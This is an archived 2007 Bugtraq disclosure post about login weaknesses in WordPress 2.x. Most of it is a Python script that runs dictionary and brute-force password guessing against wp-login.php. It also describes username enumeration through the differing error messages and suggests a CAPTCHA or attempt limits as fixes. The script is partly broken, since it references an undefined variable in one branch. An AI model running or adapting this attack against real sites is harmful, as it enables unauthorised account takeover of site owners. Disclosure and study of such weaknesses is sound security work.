Wordpress <= 2.x dictionnary & Bruteforce attack

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Wordpress <= 2.x dictionnary & Bruteforce attack
From: kadaj-diabolik@xxxxxxxxxx
Date: 3 Jan 2007 17:23:26 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

############## Source code #####################
#!usr/bin/python
# Flaw found on Wordpress
# that allow Dictionnary & Bruteforce attack
# Greetz goes to : NeoMorphS, Tiky 
# Vendor : http://wordpress.org/
# Found by : Kad (kadfrox@xxxxxxxxx / #kadaj-diabolik@xxxxxxxxxx)
import urllib , urllib2, sys, string
tab = "%s%s%s"%( string.ascii_letters, string.punctuation, string.digits )
tab = [  i for i in tab ]
def node( table, parent, size ):
        if size == 0:
                pass
        else:
                for c in table:
                        string = "%s%s"%( parent, c )
                        data = {'log': sys.argv[2],
                                'pwd': string}
                        print "[+] Testing : "+string
                        request = urllib2.Request(server, 
urllib.urlencode(data))
                        f = urllib2.urlopen(request).read()
                        if not "Incorrect password.</div>" in f: print "[!] 
Password is : "+mot ; break
                        node( table, string, size-1 )
 
def bruteforce( table, size ):
        for c in table:
                node( table, c, size-1 )
                
if (len(sys.argv) < 3):
    print "Usage : float.py <server> <user> <choice> <dico-characters>"
    print "\nDefault: User is 'admin'"
    print "Choice : 1} Dictionnary Attack, use dictionnary file"
    print "         2} Bruteforce Attack, use number of character for password"
    
else:
    server = sys.argv[1]
    if sys.argv[3] == "1":
        a , b = open(sys.argv[4],'r') , 0
        for lines in a: b = b + 1
        a.seek(0)       
        c = 0
        while (c < b):
                mot = a.readline().rstrip()
                data = {'log': sys.argv[2],
                                'pwd': mot}
                print "[+] Testing : "+mot
                request = urllib2.Request(server, urllib.urlencode(data))
                f = urllib2.urlopen(request).read()
                if not "Incorrect password.</div>" in f: print "[!] Password is 
: "+mot ; break
                else: c = c + 1 ; pass
    if sys.argv[3] == "2":
        print "[-] Server is : "+server
        print "[-] User is : "+sys.argv[2]
        print "[-] Number of characters are : "+sys.argv[4]
        number = int(sys.argv[4])
        bruteforce( tab, number )
############## Source code #####################

The problem is : many time, the default user who is created is : admin, then 
you can try to crack the password, to stop that, you can use image confirmation 
or a limit for the connection (for example, only 5 tests). 

To know if "admin" is the default user, you can try to go to the login page : 
http://site.com/wp-login.php and you try ; login : admin, pass : test (or 
anything else). 

if "Wrong password" is printed on the page, the default user is admin, but if 
there is : "Wrong Username" then it's not the default password ;) 

Kad'

Prev by Date: [ GLSA 200701-01 ] DenyHosts: Denial of Service
Next by Date: Re: [WEB SECURITY] RE: [Full-disclosure] Universal XSS with PDF files: highly dangerous
Previous by thread: [ GLSA 200701-01 ] DenyHosts: Denial of Service
Next by thread: [ GLSA 200701-02 ] Mozilla Firefox: Multiple vulnerabilities
Index(es):
- Date
- Thread